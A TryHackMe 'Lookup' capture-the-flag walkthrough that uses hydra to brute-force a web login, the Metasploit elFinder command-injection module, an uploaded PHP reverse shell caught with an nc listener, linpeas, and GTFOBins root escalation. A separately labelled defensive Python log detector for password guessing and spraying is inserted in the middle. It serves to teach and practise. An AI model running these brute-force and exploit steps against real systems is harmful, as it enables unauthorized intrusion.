THM-Lookup-Writeup

Mohamed Ali
5 min read · Nov 24, 2024

Test your enumeration skills on this boot-to-root machine.

Find This Room: Lookup

Task 1 Lookup

Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.

Note: For free users, it is recommended to use your own VM if you ever experience problems visualizing the site. Please allow 3–5 minutes for the VM to fully boot up.

Recon

whoami@mint:~/Desktop/THM-Lab/Lookup$ nmap -sV -sC -A -T4 lookup.thm 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-23 23:30 EET
Nmap scan report for lookup.thm (10.10.255.186)
Host is up (0.38s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.25 seconds

We have 2 open ports:

22 SSH

80 HTTP

When examining the source code of the page, we find login.php

Let’s do a brute-force attack on the web login form

whoami@mint:~/Desktop/THM-Lab/Lookup$ hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login:username=^USER^&password=^PASS^:F=wrong password" -V -I -t 64

Found:

Username: admin
Password: password123

When we log in with these credentials, the site says that there is an error in the username or password. Now we will keep this password and try to guess the correct username

whoami@mint:~/Desktop/THM-Lab/Lookup$ hydra -L /usr/share/wordlists/SecLists/Usernames/Names/names.txt -p password123 lookup.thm http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid login" -V -I -t 64

Now we have jose as a valid username on the server
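
Seen from the defender's side, the two hydra runs above leave different traces in a failed-login log: the first tries many passwords against one account, the second tries one password against many accounts. The following is an added example, not part of the original write-up or the room; the log format, the thresholds and the names `classify` and `sample_log` are assumptions made for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed log format (constructed): "<ISO time> login_failed ip=<ip> user=<name>"
LINE_RE = re.compile(r"^(\S+) login_failed ip=(\S+) user=(\S+)$")

def classify(lines, window=timedelta(minutes=5), max_per_user=10, max_users=10):
    """Map each source IP to the patterns it shows inside one sliding window.

    guessing: more than max_per_user failures against a single account
    spraying: failures against more than max_users distinct accounts
    """
    by_ip = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:  # ignore lines that are not failed logins
            by_ip[m.group(2)].append((datetime.fromisoformat(m.group(1)), m.group(3)))
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        counts, start, labels = Counter(), 0, set()
        for ts, user in events:
            counts[user] += 1
            # Drop events that fell out of the window ending at `ts`.
            while ts - events[start][0] > window:
                old = events[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if counts[user] > max_per_user:
                labels.add("guessing")
            if len(counts) > max_users:
                labels.add("spraying")
        if labels:
            alerts[ip] = labels
    return alerts

def sample_log():
    """Constructed sample lines: two automated sources and one person mistyping."""
    t0 = datetime(2024, 11, 23, 23, 30)
    rows = [(t0 + timedelta(seconds=i), "198.51.100.7", "admin") for i in range(40)]
    rows += [(t0 + timedelta(seconds=i), "198.51.100.8", f"user{i}") for i in range(25)]
    rows += [(t0 + timedelta(minutes=i), "203.0.113.5", "alice") for i in range(3)]
    return [f"{ts.isoformat()} login_failed ip={ip} user={u}" for ts, ip, u in rows]

if __name__ == "__main__":
    print(classify(sample_log()))
```

A per-account lockout alone only catches the first pattern; the second stays under any per-account limit, which is why the distinct-account count per source is tracked separately.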

Let’s try to log in now

As you can see, we have a subdomain name that we will add to our hosts file

Great. Read more about elFinder

We will try to log into SSH with the existing information

whoami@mint:~/Desktop/THM-Lab/Lookup$ ssh user@lookup.thm
The authenticity of host 'lookup.thm (10.10.255.186)' can't be established.
ED25519 key fingerprint is SHA256:Ndgax/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:17: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lookup.thm' (ED25519) to the list of known hosts.
think@lookup.thm's password:
Permission denied, please try again.
think@lookup.thm's password:

We will search Metasploit for the elfinder exploit

search elfinder

We found the exploit

exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

And we get a Meterpreter session

meterpreter > sysinfo
Computer : lookup
OS : Linux lookup 5.4.0-156-generic #173-Ubuntu SMP Tue Jul 11 07:25:22 UTC 2023 x86_64
Meterpreter : php/linux

We will use our own shell since we cannot read the files because we are not root

From Rev Shells

meterpreter > getsystem
[-] The "getsystem" command requires the "priv" extension to be loaded (run: `load priv`)
meterpreter > upload shell.php
[*] Uploading : /home/whoami/Desktop/THM-Lab/Lookup/shell.php -> shell.php
[*] Uploaded -1.00 B of 2.52 KiB (-0.04%): /home/whoami/Desktop/THM-Lab/Lookup/shell.php -> shell.php
[*] Completed : /home/whoami/Desktop/THM-Lab/Lookup/shell.php -> shell.php
meterpreter >
whoami@mint:~/Desktop/THM-Lab/Lookup$ nc -lnvp 5555
Listening on 0.0.0.0 5555
Connection received on 10.10.snip.190 34148
Linux lookup 5.4.0-156-generic #173-Ubuntu SMP Tue Jul 11 07:25:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
01:49:32 up 18 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$

Let’s upload linpeas to the target

We found a new password for the SSH login

josemario.AKA(think)

Now let’s capture the first flag

ssh think@lookup.thm

PrivEsc

Go to GTFOBins

Now We are ROOOOOOT!

BOOOOOOM!
